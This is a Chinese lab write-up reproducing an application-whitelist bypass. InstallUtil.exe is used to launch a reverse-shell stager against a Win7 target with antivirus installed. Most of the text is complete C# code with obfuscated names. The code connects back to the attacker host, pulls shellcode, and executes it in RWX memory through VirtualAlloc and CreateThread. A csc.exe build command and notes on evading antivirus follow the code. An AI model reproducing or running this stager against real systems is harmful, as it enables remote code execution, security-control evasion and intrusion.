对亮神基于白名单Installutil.exe 执行 payload 第二季复现

0x00 Installer简介

Installer工具是一个命令行实用程序，允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。

0x01 环境

攻击机kali 192.168.5.99
靶机win7 192.168.5.112
装有国内常见AV

0x02复现

攻击机配置监听

靶机运行

shell弹回

0x03 installutil.cs

using System;using System.Net;using System.Linq;using System.Net.Sockets;using System.Runtime.InteropServices;using System.Threading;using System.Configuration.Install;using System.Windows.Forms;
public class GQLBigHgUniLuVx {
public static void Main()
{
while(true)
{{ MessageBox.Show("doge"); Console.ReadLine();}}
}
 }
 
 [System.ComponentModel.RunInstaller(true)]
 public class esxWUYUTWShqW : System.Configuration.Install.Installer
 {
 public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
 {
 jkmhGrfzsKQeCG.LCIUtRN();
 }

 }
 public class jkmhGrfzsKQeCG
 { [DllImport("kernel")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
 [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);
 static byte[] ErlgHH(string ZwznjBJY,int KsMEeo) {
 IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
 Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
 
 try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
 catch { return null;}
 byte[] UmquAHRnhhpuE = new byte[4];
 XXxIoIXNCle.Receive(UmquAHRnhhpuE,4,0);
 int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE,0);
 byte[] qaYyFq = new byte[kFVRSNnpj +5];
 int SRCDELibA =0;
 while(SRCDELibA < kFVRSNnpj)
 { SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA +5,(kFVRSNnpj - SRCDELibA)<4096 ? (kFVRSNnpj - SRCDELibA) : 4096,0);}
 byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
 Array.Copy(TvvzOgPLqwcFFv,0, qaYyFq,1,4); qaYyFq[0]=0xBF;
 return qaYyFq;}
 static void cmMtjerv(byte[] HEHUjJhkrNS) {
 if(HEHUjJhkrNS !=null) {
 UInt32 WcpKfU = VirtualAlloc(0,(UInt32)HEHUjJhkrNS.Length,0x1000,0x40);
 Marshal.Copy(HEHUjJhkrNS,0,(IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
 IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
 UInt32 wdjYKFDCCf =0;
 IntPtr XVYcQxpp = IntPtr.Zero;
 UhxtIFnlOQatrk = CreateThread(0,0, WcpKfU, XVYcQxpp,0, ref wdjYKFDCCf);
 WaitForSingleObject(UhxtIFnlOQatrk,0xFFFFFFFF); }}
 public static void LCIUtRN() {

byte[] IBtCWU =null; IBtCWU = ErlgHH("192.168.5.99",10129);
cmMtjerv(IBtCWU);
} }

Micropoor.exe生成，不必需要那个installutil.snk文件

csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micropoor.exe  /unsafe C:\Users\Administrator\Desktop\installutil.cs

0x04总结

亮神payload直接复制格式错误较多，只需替换ip和端口即可。win7可能不存再某些依赖。运行exe被av拦截且同意后不过某些av。靶机运行payload时注意空格

0x05借鉴

https://github.com/Micropoor/Micro8/blob/master/第七十二课：基于白名单Installutil.exe执行payload第二季.pdf